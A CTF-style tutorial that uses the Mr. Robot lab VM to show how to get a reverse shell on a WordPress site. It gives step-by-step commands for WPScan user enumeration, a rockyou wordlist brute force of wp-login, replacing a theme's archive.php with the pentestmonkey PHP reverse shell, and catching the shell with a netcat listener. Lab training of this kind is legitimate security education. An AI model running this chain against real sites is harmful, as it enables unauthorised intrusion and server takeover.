This tutorial demonstrates creating a reverse shell on a device through WordPress. This exploit is useful for many CTF events and is often found in the wild.

For this walkthrough, the WordPress installation on the Mr. Robot VM will be used with an added WordPress admin account for simplicity. Complete walkthroughs for Mr. Robot are found in many places (possibly on someday in the future), but this tutorial focuses specifically on obtaining a reverse shell through WordPress themes.



  • WordPress Installation
  • WPScan
  • php-reverse-shell (pentestmonkey)
    • also located at /usr/share/webshells/php/php-reverse-shell.php on Kali


Install WPScan

  • Included in Kali Linux
  • If not currently installed on your distro:
    • $sudo apt-get update
    • Install dependencies:
      • $sudo apt install curl git libcurl4-openssl-dev make zlib1g-dev gawk g++ gcc libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 autoconf libgdbm-dev libncurses5-dev automake libtool bison pkg-config ruby ruby-bundler ruby-dev -y
    • $git clone
    • $cd wpscan
    • $bundle install –without test
    • $ruby wpscan.rb –update
    • Run wpscan commands from the wpscan folder by appending with ruby wpscan.rb  instead of just wpscan.
  • To run a WPScan without options:
    • $sudo wpscan –url
    • $sudo wpscan –url


Brute Force wp-login.php

In a browser, navigate to the /wp-login.php of your target.

wordpress wp-login

The first step in brute forcing WordPress is to enumerate users. WPScan has this feature built in already, so let’s run it.

  • $sudo wpscan –url –enumerate u

Depending on the version of WordPress, you may also use the wp-login.php login form to enumerate users. Simply enter a username and any password. The ERROR response may give this away.



So there is a user named admin, but not administrator. Let’s use WPScan to brute force the admin password.

  • $wpscan –url –wordlist /usr/share/wordlists/rockyou.txt –username admin


Success! admin:peaches


Insert Reverse Shell Into WordPress Theme

Once you have credentials, login to wp-login.php and navigate to the theme editor.

  • Appearance > Editor

Take note of the current theme being edited. For this tutorial, we are editing the ‘Twenty Thirteen’ theme. Underneath the Templates sidebar, there are multiple files, including *.css, *.php, and possibly others. As our reverse shell is written in PHP, let’s target a PHP file. The archive.php file is typically a good one to use.


Delete all the text in the archive.php file and replace it with that of our PHP reverse shell.

  • Included on Kali at /usr/share/webshells/php/php-reverse-shell.php
  • Direct from PentestMonkey
    • $wget
    • $tar -xzf php-reverse-shell-1.0.tar.gz
    • $cat php-reverse-shell-1.0/php-reverse-shell.php


Update the following lines in the php script to your attacker IP address and the port you wish to connect on:

  • Default
    • $ip = ‘’; // CHANGE THIS
    • $port = 1234; // CHANGE THIS
  • Updated
    • $ip = ‘’;
    • $port = 443;


You may find your IP address by entering the following command in a terminal on your attacker device (typically the inet address under eth0):

  • $sudo ifconfig
    •  $sudo ip a

Click on the ‘Update File’ button at the bottom of the script to save your changes. If the file was saved correctly, the ‘File edited successfully’ notification will display above the code.



Connect to the Reverse Shell

In a terminal, start a netcat listener on the port specified in the PHP reverse shell script.

  • $sudo nc -nvlp 443


In a new tab on your browser, navigate to the updated archive.php page using the following template:

  • http://<url-or-ip>/wp-content/themes/<theme-name>/archive.php


Success! We now have a reverse shell as a low privilege user.


On Your Own

Obtaining a low privilege shell is the first step, but escalating to root or admin privileges gives you the keys to the kingdom. We will have additional posts in the future to cover privilege escalation, but see what you can find on your own. A great place to start is exploit-db.